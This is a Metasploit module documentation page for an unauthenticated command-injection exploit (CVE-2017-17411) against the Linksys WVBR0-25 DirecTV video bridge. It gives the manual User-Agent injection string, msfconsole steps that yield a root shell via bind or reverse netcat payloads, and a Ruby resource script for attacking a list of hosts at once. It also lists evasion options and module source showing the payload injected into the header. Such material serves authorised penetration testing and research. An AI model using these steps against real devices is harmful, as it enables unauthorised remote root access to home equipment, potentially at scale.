Linksys WVBR0-25 User-Agent Command Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Source code: modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb
Disclosure date: 2017-12-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-17411

The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using linksys_wvbr0_user_agent_exec_noauth against a single host

Normally, you can use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth this way:

msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show targets
    ... a list of targets ...
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set TARGET target-id
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show options
    ... show and set options ...
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

Using linksys_wvbr0_user_agent_exec_noauth against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your linksys_wvbr0_user_agent_exec_noauth will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits a command injection vulnerability in the Linksys WVBR0-25 wireless video bridge. More information about the device itself can be found on AT&T's manuals page under the "DIRECTV Wireless Video Bridge Gen2 Product Manual" heading, as well as on this unofficial product page. A description of the exploited vulnerability is available in the Vulnerability Details section of this advisory. The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.

There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to "; printf "[random string]. If the response contains an md5 hash of the random string, the device is vulnerable to command injection.

Manual exploitation would equate to browsing to the URI http://<ip>/ with the User-Agent header set to "; command;.

Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit.

Verification Steps


  1. Make sure the device is running.
  2. Start msfconsole.
  3. Do: use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
  4. Do: set payload cmd/unix/bind_netcat
  5. Do: set RHOST [ip]
  6. Do: exploit
  7. You should get a shell.

Options


PAYLOAD

The generic and netcat payload types are valid.

Scenarios


Firmware 1.0.39

The following is an example run getting a shell:

  msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
  payload => cmd/unix/bind_netcat
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
  RHOST => 10.0.0.104
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

  [*] 10.0.0.104:80 - Trying to access the device ...
  [*] Started bind handler
  [*] 10.0.0.104:80 - Exploiting...
  [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
  id

  uid=0(root) gid=0(root)

Go back to menu.

Msfconsole Usage


Here is how the linux/http/linksys_wvbr0_user_agent_exec_noauth exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-17411
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

Module Options


This is a complete list of options available in the linux/http/linksys_wvbr0_user_agent_exec_noauth exploit:

msf6 exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show options

Module options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/linksys_wvbr0_user_agent_exec_noauth exploit:

msf6 exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show advanced

Module advanced options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/linksys_wvbr0_user_agent_exec_noauth module can exploit:

msf6 exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/linksys_wvbr0_user_agent_exec_noauth exploit:

msf6 exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_netcat                        normal  No     Unix Command Shell, Bind TCP (via netcat)
   1  payload/cmd/unix/generic                            normal  No     Unix Command, Generic Command Execution
   2  payload/cmd/unix/pingback_bind                      normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   3  payload/cmd/unix/pingback_reverse                   normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   4  payload/cmd/unix/reverse_netcat                     normal  No     Unix Command Shell, Reverse TCP (via netcat)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/linksys_wvbr0_user_agent_exec_noauth exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failed to access the vulnerable device


Here is a relevant code snippet related to the "<PEER> - Failed to access the vulnerable device" error message:

67:	
68:	  def exploit
69:	    print_status("#{peer} - Trying to access the device ...")
70:	
71:	    unless check == Exploit::CheckCode::Vulnerable
72:	      fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device")
73:	    end
74:	
75:	    print_status("#{peer} - Exploiting...")
76:	
77:	    if datastore['PAYLOAD'] == 'cmd/unix/generic'

<PEER> - Command execution failed


Here is a relevant code snippet related to the "<PEER> - Command execution failed" error message:

95:	        print_good("#{peer} - Command sent successfully")
96:	        if res.body.to_s =~ /ret :.+?#{beg_boundary}(.*)/  # all output ends up on one line
97:	          print_status("#{peer} - Command output: #{$1}")
98:	        end
99:	      else
100:	        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
101:	      end
102:	    rescue ::Rex::ConnectionError
103:	      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
104:	    end
105:	  end

<PEER> - Failed to connect to the web server


Here is a relevant code snippet related to the "<PEER> - Failed to connect to the web server" error message:

98:	        end
99:	      else
100:	        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
101:	      end
102:	    rescue ::Rex::ConnectionError
103:	      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
104:	    end
105:	  end
106:	
107:	  def exploit_session
108:	    begin

<PEER> - Failed to connect to the web server


Here is a relevant code snippet related to the "<PEER> - Failed to connect to the web server" error message:

108:	    begin
109:	      send_request_raw({
110:	        'method' => 'GET',
111:	        'uri'    => '/',
112:	        'agent' => "\"; #{payload.encoded} #"
113:	      })
114:	    rescue ::Rex::ConnectionError
115:	      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
116:	    end
117:	  end
118:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • HeadlessZeke

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.